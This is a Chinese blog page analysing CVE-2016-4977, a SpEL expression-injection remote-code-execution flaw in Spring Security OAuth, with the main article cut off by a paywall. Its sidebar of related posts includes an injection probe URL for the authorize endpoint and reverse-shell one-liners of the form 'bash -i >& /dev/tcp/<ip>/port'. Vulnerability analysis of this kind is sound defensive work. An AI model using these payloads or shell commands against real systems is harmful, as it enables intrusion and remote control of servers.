CVE-2016-4977 RCE in Spring Security OAuth漏洞分析

最新推荐文章于 2024-04-19 09:51:40 发布
最新推荐文章于 2024-04-19 09:51:40 发布
阅读量1.9k 收藏 1
点赞数
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c0c0cf/article/details/52613002
版权

新浪微博:

http://weibo.com/u/2275304001/home?wvr=5

微信公众号

DebugPwn


漏洞描述:

When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote code execution via the crafting of the value for response_type.

也就是说再处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过精心构造response_type值可以触发远程代码执行漏洞。实际分析下来,任何异常抛给handError来处理都会执行代码。


比源代码

diff1:

https://github.com/spring-projects/spring-security-oauth/commit/fff77d3fea477b566bcacfbfc95f85821a2bdc2d

最低0.47元/天 解锁文章
0c0c0f
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
Spring Security OAuth2 远程命令执行漏洞复现(CVE-2016-4977
来到了学渣的博客
11-09 1832
访问路径/oauth/authorize,会看到左上角有个绿色叶子的标志,一般都是spring或者springboot 直接打poc,可以看到有el表达式注入的形式 /oauth/authorize?response_type=${2*3}&client_id=acme&scope=openid&redirect_uri=http://test 如果要命令执行需要把执行结果带外才行,java的命令执行漏洞基本需要编码 http://www.jackson-t.ca/runti
CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(超详细版!)
精品博客,你值得一看~
09-02 1093
它是为了解决企业应用开发的复杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.
探索SpringExploit:一款强大的Spring安全漏洞检测工具
最新发布
gitblog_00051的博客
04-19 552
探索SpringExploit:一款强大的Spring安全漏洞检测工具 项目地址:https://gitcode.com/SummerSec/SpringExploit 项目简介 SpringExploit 是一个由SummerSec开发的开源项目,专为Java开发者和安全工程师设计,用于检测Spring框架中的潜在安全漏洞。在依赖于Spring进行应用开发的大环境中,这个工具可以帮助开发者提前发...
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977
qq_54713392的博客
05-08 755
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977漏洞原理: Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)在vulhub靶场...
spring Security OAuth2 远程命令执行漏洞CVE-2016-4977)复现-kali
qq_41760817的博客
12-04 1249
spring Security OAuth2 远程命令执行漏洞CVE-2016-4977)复现
漏洞复现----39、Spring Security OAuth2 远程命令执行漏洞 (CVE-2016-4977)
七天
06-29 1232
Spring Security OAuth2 远程命令执行漏洞 (CVE-2016-4977)
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
12-26
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
CVE-2022-31692 Spring Security Oauth2 Client权限提升漏洞
LJQClqjc的博客
11-03 1505
棱镜七彩漏洞深度分析
RCE with spring-security-oauth2漏洞复现(CVE-2018-1260)
公众号shadow sock7
04-29 1101
参考:https://xz.aliyun.com/t/2330 初始化:先根据https://github.com/wanghongfei/spring-security-oauth2-example 将内容保存为init.sql文件,然后启动mysql:参考https://blog.csdn.net/caiqiiqi/article/details/89642032 然后载入sql脚本: mys...
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977)——漏洞复现
weixin_42090431的博客
11-27 95
bash -i >& /dev/tcp/你的ip/6666 0>&1(对这部分base64编码)
Spring远程代码执行漏洞CVE-2017-4971)
tbygadgjsad的博客
03-17 696
运行测试环境:docker-compose up -d 等待环境启动后,访问http://ip:8080,将看到一个酒店预订的页面 首先访问http://ip:8080/login,用页面左边给出的任意一个账号/密码登录系统: 然后访问id为1的酒店http://ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Process”(从这一步,其实WebFlow就正式开始了): 再点击确认“Confirm”:进行抓包 ...
Spring系列之CVE-2022-22947
weixin_51721627的博客
06-24 1174
Spring系列挺好的,好就好在全是漏洞
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
weixin_45715461的博客
08-10 1464
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
昨天Spring发布新的Spring Cloud CVE漏洞补丁
码农小胖哥
03-30 5207
昨天Spring发布Spring Cloud Function 3.1.7和3.2.3以解决CVE-2022-22963:Spring 表达式资源访问漏洞[1]。在 Spring Cloud Function 版本 3.1.6、3.2.2 和更旧的不受支持的版本中,当使用路由功能时,用户可以借助于特殊的SpEL访问本地资源,漏洞级别为:Medium。Spring Clou...
jQuery框架漏洞全总结及开发建议
热门推荐
iokla
10-02 1万+
一、jQuery简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。 据一项调查报告,在对433,000个网站的分析中发现,77%的网站至少使用了一个具有已知安全漏洞的前端JavaScript库,而jQuery位列榜首,而且远远超过其他库。但事实上这些库有可用的不
CVE-2016-4977
09-01
CVE-2016-4977是指Spring Security OAuth2远程命令执行漏洞。该漏洞的复现过程可以参考第一篇和第二篇的参考链接。该漏洞的影响版本较广泛,具体版本信息可以在参考链接中找到。该漏洞的利用方式可以使用bash命令进行远程执行,例如使用"bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/1122 0>&1"这样的命令进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【vulhub】 Spring boot Security OAuth RCE (CVE-2016-4977) 漏洞验证与getshell复现](https://blog.csdn.net/qq_45300786/article/details/119249422)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [cve-2016-4977(spring-security-oauth) RCE漏洞复现](https://blog.csdn.net/m0_58596609/article/details/124323206)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值